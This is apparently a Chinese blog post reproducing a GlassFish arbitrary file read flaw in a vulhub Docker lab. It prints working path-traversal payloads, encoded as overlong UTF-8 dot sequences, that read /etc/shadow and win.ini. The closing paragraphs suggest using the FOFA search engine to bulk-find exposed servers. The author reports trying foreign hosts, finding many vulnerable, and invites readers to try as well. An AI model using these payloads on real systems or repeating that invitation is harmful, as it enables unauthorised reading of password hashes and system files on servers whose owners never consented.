1.Glassfish 简介
GlassFish 是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。
2.漏洞类型
任意文件读取漏洞,可以利用此漏洞读取受害者的任意文件
3.漏洞复现
3.1我们还是使用 vulhub 漏洞环境
点击查看代码
docker-compose build
docker-compose up -d
docker-compose ps
使用上诉命令启动环境,并查看目标端口,并用浏览器访问

3.2因为docker 环境在 linux 所以使用 使用linux 系统命令读取文件附linux和windows 系统 payload
点击查看代码
linux_poc:
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/shadow
window_poc:
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
其中 可以通过这个漏洞读取 /etc/shadow 下的敏感文件

windows 环境下类似,可以通过 fofa 搜索符合条件的地址,可以通过windows 系统环境 payload 进行验证,这里不再赘述,读者可以根据自己的情况,在最后写入自己想读取的文件所在路径。
可以使用 fofa 批量搜索

我发现国内一个都没有。。。全是国外的,试了试发现还是有许多都存在漏洞的,感兴趣的可以试一下。